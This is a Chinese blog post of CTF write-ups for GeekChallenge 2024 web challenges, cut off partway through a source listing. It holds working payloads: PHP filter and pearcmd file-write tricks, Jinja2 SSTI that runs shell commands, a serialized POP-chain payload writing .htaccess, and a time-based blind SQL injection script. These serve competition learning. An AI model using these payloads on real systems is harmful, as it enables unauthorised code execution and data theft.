<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="GeekChallenge_WriteUps100%的⚪打开观察，一眼JS分析，直接审源码 搜索关键词：alert 观察到flag， Base64解密 SYC{5UcH_@_Wo0d3rfUl_CiRc1e}  rce_meRCE绕过。 先POST一个start now 参数内含有. 一眼非法传参问题。将一个下划线变成[被php解析后转化成下划线，后边的非法.字符就不会被转化，从而参数正常。 再绕">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://127.0.0.1:4000/2024/11/16/GeekChallenge_WriteUps/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="GeekChallenge_WriteUps100%的⚪打开观察，一眼JS分析，直接审源码 搜索关键词：alert 观察到flag， Base64解密 SYC{5UcH_@_Wo0d3rfUl_CiRc1e}  rce_meRCE绕过。 先POST一个start now 参数内含有. 一眼非法传参问题。将一个下划线变成[被php解析后转化成下划线，后边的非法.字符就不会被转化，从而参数正常。 再绕">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps3.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps1.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps2.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps26.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps27.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps28.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps29.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps30.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps31.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps25.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps24.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps23.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps22.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps21.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps20.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps19.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps18.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps17.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps9.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps10.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps11.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps12.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps13.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps14.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps15.jpg">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps16.jpg">
<meta property="og:image" content="c:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241105172921363.png">
<meta property="og:image" content="c:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241105203304055.png">
<meta property="og:image" content="c:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241105203440848.png">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\image-20241109151012899.png">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\image-20241109150953505.png">
<meta property="og:image" content="c:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241106172354953.png">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\image-20241111203741722.png">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\c4a34f266c9a6323c0a84118b48a05cf.png">
<meta property="og:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\image-20241111204931117.png">
<meta property="og:image" content="c:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241108143035783.png">
<meta property="og:image" content="c:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241108143212622.png">
<meta property="og:image" content="c:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241108143234207.png">
<meta property="og:image" content="c:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241108143816156.png">
<meta property="og:image" content="c:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241108143910936.png">
<meta property="og:image" content="c:\Users\11840\AppData\Roaming\Typora\typora-user-images\image-20241021112315879.png">
<meta property="og:image" content="c:\Users\11840\AppData\Roaming\Typora\typora-user-images\image-20241021111904548.png">
<meta property="og:image" content="c:\Users\11840\AppData\Roaming\Typora\typora-user-images\image-20241021112435558.png">
<meta property="og:image" content="c:\Users\11840\AppData\Roaming\Typora\typora-user-images\image-20241021112541237.png">
<meta property="og:image" content="c:\Users\11840\AppData\Roaming\Typora\typora-user-images\image-20241023112010718.png">
<meta property="og:image" content="c:\Users\11840\AppData\Roaming\Typora\typora-user-images\image-20241023120602179.png">
<meta property="og:image" content="c:\Users\11840\AppData\Roaming\Typora\typora-user-images\image-20241023122142852.png">
<meta property="og:image" content="c:\Users\11840\AppData\Roaming\Typora\typora-user-images\image-20241023125952459.png">
<meta property="og:image" content="c:\Users\11840\AppData\Roaming\Typora\typora-user-images\image-20241023130020905.png">
<meta property="og:image" content="c:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241106185230621.png">
<meta property="og:image" content="https://i-blog.csdnimg.cn/blog_migrate/6e7d769ec4b9151c54b48e0f485d403c.png">
<meta property="og:image" content="c:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241106194916970.png">
<meta property="og:image" content="c:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241106194943424.png">
<meta property="og:image" content="c:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241106200528295.png">
<meta property="og:image" content="c:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241106200304227.png">
<meta property="og:image" content="c:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241106204312124.png">
<meta property="og:image" content="c:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241106204226211.png">
<meta property="article:published_time" content="2024-11-16T13:39:09.628Z">
<meta property="article:modified_time" content="2024-11-16T13:41:55.813Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="e:\Geek_WP\GeekChallenge_WriteUps.assets\wps3.jpg">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://127.0.0.1:4000"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-GeekChallenge_WriteUps" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2024/11/16/GeekChallenge_WriteUps/" class="article-date">
  <time class="dt-published" datetime="2024-11-16T13:39:09.628Z" itemprop="datePublished">2024-11-16</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="GeekChallenge-WriteUps"><a href="#GeekChallenge-WriteUps" class="headerlink" title="GeekChallenge_WriteUps"></a>GeekChallenge_WriteUps</h1><h2 id="100-的⚪"><a href="#100-的⚪" class="headerlink" title="100%的⚪"></a>100%的⚪</h2><p>打开观察，一眼JS分析，直接审源码</p>
<p>搜索关键词：alert</p>
<p>观察到flag，</p>
<p>Base64解密</p>
<p>SYC{5UcH_@_Wo0d3rfUl_CiRc1e}</p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps3.jpg" alt="img"></p>
<h2 id="rce-me"><a href="#rce-me" class="headerlink" title="rce_me"></a>rce_me</h2><p>RCE绕过。</p>
<p>先POST一个start now</p>
<p>参数内含有. 一眼非法传参问题。将一个下划线变成[被php解析后转化成下划线，后边的非法.字符就不会被转化，从而参数正常。</p>
<p>再绕过md5弱比较问题，右侧md5值为0e开头，左侧寻找一个数值经过sha1加密后为0e开头且为数字。(10932435112)</p>
<p>成功绕过</p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps1.jpg" alt="img"></p>
<p>再绕过year，由于intval存在漏洞，传递year&#x3D;2e4时，会直接开始比较e前方的数字，</p>
<p>而对于语句进行加法后再比较会比较完整数字，就会大于2025直接bypass。</p>
<p>Preg_match直接数组绕过，处理不了数组直接flase，bypass。</p>
<p>最后code直接命令执行，直接调用system，cat &#x2F;f* 打印出flag。</p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps2.jpg" alt="img"></p>
<h2 id="ez-include"><a href="#ez-include" class="headerlink" title="ez_include:"></a>ez_include:</h2><p><strong>一眼文件包含：php的文件包含机制是将已经包含的文件与文件的真实路径放进哈希表中，当已经require_once(‘flag.php’)，已经include的文件不可以再require_once</strong></p>
<p><strong>在这里有个小知识点，&#x2F;proc&#x2F;self指向当前进程的&#x2F;proc&#x2F;pid&#x2F;，&#x2F;proc&#x2F;self&#x2F;root&#x2F;是指向&#x2F;的符号链接，想到这里，用伪协议配合多级符号链接的办法进行绕过，payload:</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">**php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/starven_secret.php**</span><br></pre></td></tr></table></figure>

<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps26.jpg" alt="img"></p>
<p><strong>成功回显base64解码得到：&#x2F;levelllll2.php</strong></p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps27.jpg" alt="img"></p>
<p><strong>这里进来后看到“register_argc_argv &#x3D; On”明显的pearcmd的题型，但是过滤了很多，这里翻了很多大佬的blog，看到了这一句，感觉有戏，尝试以下。</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">**Payload:**</span><br><span class="line"></span><br><span class="line">**?+config-create+/&amp;syc=/usr/local/lib/php/pearcmd.php&amp;/&lt;?=phpinfo()?&gt;+/tmp/kenton.php**</span><br></pre></td></tr></table></figure>

<p><strong>这里值得注意的是，我们前面被过滤的config-create被拼接到了URL里，完美绕过正则匹配</strong></p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps28.jpg" alt="img"></p>
<p><strong>接下来，先看看phpinfo里边有什么。</strong></p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps29.jpg" alt="img"></p>
<p><strong>G、本以为美美读到，结果细看发现传上去的&lt;&gt;被转义url编码了，修改后再试一次。</strong></p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps30.jpg" alt="img"></p>
<p><strong>再读一读：</strong></p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps31.jpg" alt="img"></p>
<h2 id="Can-you-Pass-Me"><a href="#Can-you-Pass-Me" class="headerlink" title="Can_you_Pass_Me"></a>Can_you_Pass_Me</h2><p>打开后输入框：明显的ssti，但是输入{{}}会被waf拦截，</p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps25.jpg" alt="img"></p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps24.jpg" alt="img"></p>
<p>抓包观察到需要在&#x2F;submit路由下POST一个name值，直接上强度，脚本一把梭！</p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps23.jpg" alt="img"></p>
<p>得到的payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;%print ((((joiner|attr(\&#x27;_\&#x27;\&#x27;_init__\&#x27;)|attr(\&#x27;_\&#x27;\&#x27;_globals__\&#x27;)|attr(\&#x27;__g\&#x27;\&#x27;etitem__\&#x27;))(\&#x27;_\&#x27;\&#x27;_builtins__\&#x27;)).__import__(&quot;o&quot;&quot;s&quot;)|attr(\&#x27;p\&#x27;\&#x27;open\&#x27;))(\&#x27;echo f3n j1ng;\&#x27;)|attr(\&#x27;r\&#x27;\&#x27;ead\&#x27;))()%&#125;&#x27;&#125;</span><br></pre></td></tr></table></figure>

<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps22.jpg" alt="img"></p>
<p>直接getshell后查看根目录：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;%print ((((joiner|attr(\&#x27;_\&#x27;\&#x27;_init__\&#x27;)|attr(\&#x27;_\&#x27;\&#x27;_globals__\&#x27;)|attr(\&#x27;__g\&#x27;\&#x27;etitem__\&#x27;))(\&#x27;_\&#x27;\&#x27;_builtins__\&#x27;)).__import__(&quot;o&quot;&quot;s&quot;)|attr(\&#x27;p\&#x27;\&#x27;open\&#x27;))( &quot;\\x6c\\x73\\x20\\x2f&quot; )|attr(\&#x27;r\&#x27;\&#x27;ead\&#x27;))()%&#125;&#x27;&#125;</span><br></pre></td></tr></table></figure>

<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps21.jpg" alt="img"></p>
<p>Cat &#x2F;flag一下：</p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps20.jpg" alt="img"></p>
<p>Flask框架-&gt;我们去app&#x2F;app.py里去看一下源码：</p>
<p>看到过滤了很多函数：</p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps19.jpg" alt="img"></p>
<p>审计发现直接读取flag 会被waf掉，我们直接base64！</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;%print ((((joiner|attr(\&#x27;_\&#x27;\&#x27;_init__\&#x27;)|attr(\&#x27;_\&#x27;\&#x27;_globals__\&#x27;)|attr(\&#x27;__g\&#x27;\&#x27;etitem__\&#x27;))(\&#x27;_\&#x27;\&#x27;_builtins__\&#x27;)).__import__(&quot;o&quot;&quot;s&quot;)|attr(\&#x27;p\&#x27;\&#x27;open\&#x27;))(&quot;\\x63\\x61\\x74\\x20\\x2f\\x66\\x6c\\x61\\x67\\x20\\x7c\\x20\\x62\\x61\\x73\\x65\\x36\\x34&quot;)|attr(\&#x27;r\&#x27;\&#x27;ead\&#x27;))()%&#125;&#x27;&#125;</span><br></pre></td></tr></table></figure>

<p>得到：</p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps18.jpg" alt="img"></p>
<p>解码：</p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps17.jpg" alt="img"></p>
<h2 id="Ez-Pop"><a href="#Ez-Pop" class="headerlink" title="Ez Pop"></a>Ez Pop</h2><p>打开题目明显的反序列化问题，首先来找链子，</p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps9.jpg" alt="img"></p>
<p>观察到这段程序的入口应该是__destruct方法，接着看会调用$meimeng属性的一个不知名方法（source），可以联想到Geek类里的__get魔术方法，，这里的get方法明显是会返回一个函数，典型的把对象当作函数调用，触发invoke方法，</p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps10.jpg" alt="img"></p>
<p>这里找到invoke方法，是直接将meimeng作为字符串输出，那么就可以找到Geek的第二个魔术方法，__toString，__toString方法会调用GSBP属性的一个不知名方法</p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps11.jpg" alt="img"></p>
<p>这里直接联想到SYC类里的__call方法，这样看来就能够进行file_put_contens()函数的利用了。</p>
<p>链子：</p>
<p>Lover::meimeng-&gt;Geek::__get-&gt;Lover::__invoke-&gt;Geek::__toString-&gt;SYC::__call</p>
<p>接下来看程序入口</p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps12.jpg" alt="img"></p>
<p>很明显对于miemeng这个字符串进行了过滤，在php反序列化时，字符串前端的s是小写时表示字符串解析，而是S大写时，即表示用16进制解析，只需要将meimeng中的一个字母替换整16进制即可。</p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps13.jpg" alt="img"></p>
<p>这里需要先将J1rry进行判断是否被设置，再将其值进行文件包含，读取J1rry的值是否为: “Welcome GeekChallenge 2024”，很明显的php伪协议绕过，使用data即可绕过。</p>
<p>“data:&#x2F;&#x2F;text&#x2F;plain,Welcome GeekChallenge 2024“</p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps14.jpg" alt="img"></p>
<p>最后就是最难的死亡绕过问题了，这个问题难了我四天然后尝试了很多之后就没头绪了，在这里感谢@HYH对这个问题的理论支持！！</p>
<p>首先经典的死亡绕过已经讲的非常通透了，可以看文章。</p>
<p>里面的好多方法我都尝试过了，最后通过文件预包含解决了这个问题。</p>
<p>php:&#x2F;&#x2F;filter&#x2F;write&#x3D;string.strip_tags&#x2F;?&gt;php_value auto_prepend_file&#x2F;flag\n#&#x2F;resource&#x3D;.htaccess</p>
<p>如果题目环境过滤了很多过滤器的话，怎么实现读取flag’呢？</p>
<p>这里可以直接自定义预包含文件，再次访问页面即可包含flag文件，进行读取；主要还是利用.htaccess的功效；</p>
<p>POC：</p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps15.jpg" alt="img"></p>
<p>最终Payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">O%3A5%3A%22lover%22%3A2%3A%7Bs%3A5%3A%22J1rry%22%3Bs%3A44%3A%22data%3A%2F%2Ftext%2Fplain%2CWelcome+GeekChallenge+2024%22%3BS%3A7%3A%22%5C6deimeng%22%3BO%3A4%3A%22Geek%22%3A1%3A%7Bs%3A4%3A%22GSBP%22%3BO%3A5%3A%22lover%22%3A2%3A%7Bs%3A5%3A%22J1rry%22%3Bs%3A44%3A%22data%3A%2F%2Ftext%2Fplain%2CWelcome+GeekChallenge+2024%22%3BS%3A7%3A%22%5C6deimeng%22%3BO%3A4%3A%22Geek%22%3A1%3A%7Bs%3A4%3A%22GSBP%22%3BO%3A3%3A%22SYC%22%3A1%3A%7Bs%3A7%3A%22starven%22%3Bs%3A93%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dstring.strip_tags%2F%3F%3Ephp_value+auto_prepend_file+%2Fflag%0A%23%2Fresource%3D.htaccess%22%3B%7D%7D%7D%7D%7D</span><br><span class="line"></span><br><span class="line"> </span><br></pre></td></tr></table></figure>

<p>多点几次就能够看到被包含的Flag文件：</p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\wps16.jpg" alt="img"></p>
<h2 id="FunnySQL"><a href="#FunnySQL" class="headerlink" title="FunnySQL:"></a>FunnySQL:</h2><p>打开发现有一个输入框，输入后看到是Get型提交方式，试着输入数据发现不管输入什么页面是没有任何反应的。</p>
<p>明显的时间盲注，打开抓包软件fuzzy一波看看哪些被过滤了。明显（+、&#x3D;、sleep、hander、or、–+、information、and、ascii、ord、floor、read、rand、format、xor、cursor、%20、%0A、SEPARATOR、BEFORE、空格）过滤了这一大堆，当看到information被过滤的时候那么这道题就得使用无列名注入了。考点：时间盲注+无列名</p>
<p> <img src="C:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241105172921363.png" alt="image-20241105172921363"></p>
<p>由于sleep被过滤了，我们采用benchmark函数进行时间判断benchmark(1000000,sha(‘xxx’))，同时通过if()语句嵌入select查询语句来进行截取和查询。通过构造脚本来进行查询数据库和表的信息。等号被过滤了，我选择用 like，or替换为 ||，这样就能够凑齐想要执行语句的paylaod了。同时information被ban了的情况下，我们使用替换，由于空格被过滤了，我们需要用&#x2F;**&#x2F;来进行替换绕过。</p>
<p><img src="C:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241105203304055.png" alt="image-20241105203304055"></p>
<p>思路：编写python 脚本来观察检测发送请求与接收请求之间的时间差，同时，通过构造benchmark函数来控制一个时长（我这里是大于1.5秒）通常这里跟自己的网速有关，网络不稳定时测试容易出问题。同时构造一个字典，用于截取延时发生时的测试字符，注：这里的字符集需要足够全，同时不包括下划线。</p>
<p>我们编写的整个脚本来进行测试</p>
<p>主要的构想PAYLOAD：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#payload = f&quot;1&#x27;||if((substr((select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name/**/like&#x27;syclover&#x27;),&#123;j&#125;,1)like&#x27;&#123;i&#125;&#x27;),benchmark(100000,sha(1)),0)#&quot;</span></span><br><span class="line"><span class="comment">#payload = f&quot;1&#x27;||if((substr((select/**/group_concat(column_name)/**/from/**/mysql.innodb_table_stats/**/where/**/table_name/**/like&#x27;Rea11ys3ccccccr3333t&#x27;),&#123;j&#125;,1)like&#x27;&#123;i&#125;&#x27;),benchmark(3333333,sha(1)),0)#&quot;</span></span><br><span class="line">payload = <span class="string">f&quot;1&#x27;||if((substr((select/**/`1`/**/from(select/**/1/**/union/**/select*from/**/Rea11ys3ccccccr3333t)a/**/limit/**/1,1),<span class="subst">&#123;j&#125;</span>,1)/**/like&#x27;<span class="subst">&#123;i&#125;</span>&#x27;),BENCHMARK(10000000,SHA1(&#x27;syc&#x27;)),1)#&quot;</span></span><br></pre></td></tr></table></figure>

<p><img src="C:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241105203440848.png" alt="image-20241105203440848"></p>
<p>通过测试得到数据为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Database：syclover Tables：Rea11ys3ccccccr3333t、users</span><br></pre></td></tr></table></figure>

<p>![image-20241105205531096](C:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241105205531096.png</p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\image-20241109151012899.png" alt="image-20241109151012899"></p>
<p><img src="E:\Geek_WP\GeekChallenge_WriteUps.assets\image-20241109150953505.png" alt="image-20241109150953505"></p>
<h2 id="EZ-SSRF"><a href="#EZ-SSRF" class="headerlink" title="EZ SSRF"></a>EZ SSRF</h2><p>拿到前端页面，提示找找网站的别处，<a href="http://www.zip找到网站源码：">www.zip找到网站源码：</a></p>
<p>源码有三个页面，其中的h4d333333.php、calculator.php为主要代码。</p>
<p>审计一波观察到php原生类SoapClient，</p>
<p><img src="C:\Users\86158\AppData\Roaming\Typora\typora-user-images\image-20241106172354953.png" alt="image-20241106172354953"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">SoapClient &#123;</span><br><span class="line">    <span class="comment">/* 方法 */</span></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_ invoke__">__construct</span> ( <span class="keyword">string</span>|<span class="literal">null</span> <span class="variable">$wsdl</span> , <span class="keyword">array</span> <span class="variable">$options</span> = [] )</span><br><span class="line">    <span class="keyword">public</span> <span class="title function_ invoke__">__call</span> ( <span class="keyword">string</span> <span class="variable">$name</span> , <span class="keyword">array</span> <span class="variable">$args</span> ) : <span class="keyword">mixed</span></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_ invoke__">__doRequest</span> ( <span class="keyword">string</span> <span class="variable">$request</span> , <span class="keyword">string</span> <span class="variable">$location</span> , <span class="keyword">string</span> <span class="variable">$action</span> , <span class="keyword">int</span> <span class="variable">$version</span> , <span class="keyword">bool</span> <span class="variable">$oneWay</span> = <span class="literal">false</span> ) : <span class="keyword">string</span>|<span class="literal">null</span></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_ invoke__">__getCookies</span> ( ) : <span class="keyword">array</span></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_ invoke__">__getFunctions</span> ( ) : <span class="keyword">array</span>|<span class="literal">null</span></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_ invoke__">__getLastRequest</span> ( ) : <span class="keyword">string</span>|<span class="literal">null</span></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_ invoke__">__getLastRequestHeaders</span> ( ) : <span class="keyword">string</span>|<span class="literal">null</span></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_ invoke__">__getLastResponse</span> ( ) : <span class="keyword">string</span>|<span class="literal">null</span></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_ invoke__">__getLastResponseHeaders</span> ( ) : <span class="keyword">string</span>|<span class="literal">null</span></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_ invoke__">__getTypes</span> ( ) : <span class="keyword">array</span>|<span class="literal">null</span></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_ invoke__">__setCookie</span> ( <span class="keyword">string</span> <span class="variable">$name</span> , <span class="keyword">string</span>|<span class="literal">null</span> <span class="variable">$value</span> = <span class="literal">null</span> ) : <span class="keyword">void</span></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_ invoke__">__setLocation</span> ( <span class="keyword">string</span> <span class="variable">$location</span> = <span class="string">&quot;&quot;</span> ) : <span class="keyword">string</span>|<span class="literal">null</span></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_ invoke__">__setSoapHeaders</span> ( SoapHeader|<span class="keyword">array</span>|<span class="literal">null</span> <span class="variable">$headers</span> = <span class="literal">null</span> ) : <span class="keyword">bool</span></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_ invoke__">__soapCall</span> ( <span class="keyword">string</span> <span class="variable">$name</span> , <span class="keyword">array</span> <span class="variable">$args</span> , <span class="keyword">array</span>|<span class="literal">null</span> <span class="variable">$options</span> = <span class="literal">null</span> , SoapHeader|<span class="keyword">array</span>|<span class="literal">null</span> <span class="variable">$inputHeaders</span> = <span class="literal">null</span> , <span class="keyword">array</span> &amp;<span class="variable">$outputHeaders</span> = <span class="literal">null</span> ) : <span class="keyword">mixed</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可以看到，该内置类有一个 <code>__call</code> 方法，当 <code>__call</code> 方法被触发后，它可以发送 HTTP 和 HTTPS 请求。正是这个 <code>__call</code> 方法，使得 SoapClient 类可以被我们运用在 SSRF 中。SoapClient 这个类也算是目前被挖掘出来最好用的一个内置类。初步发现存在SSRF+CRLF，插入任意的HTTP头进行攻击。</p>
<h2 id="PHP不比Java差"><a href="#PHP不比Java差" class="headerlink" title="PHP不比Java差"></a>PHP不比Java差</h2><p>打开看到源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span 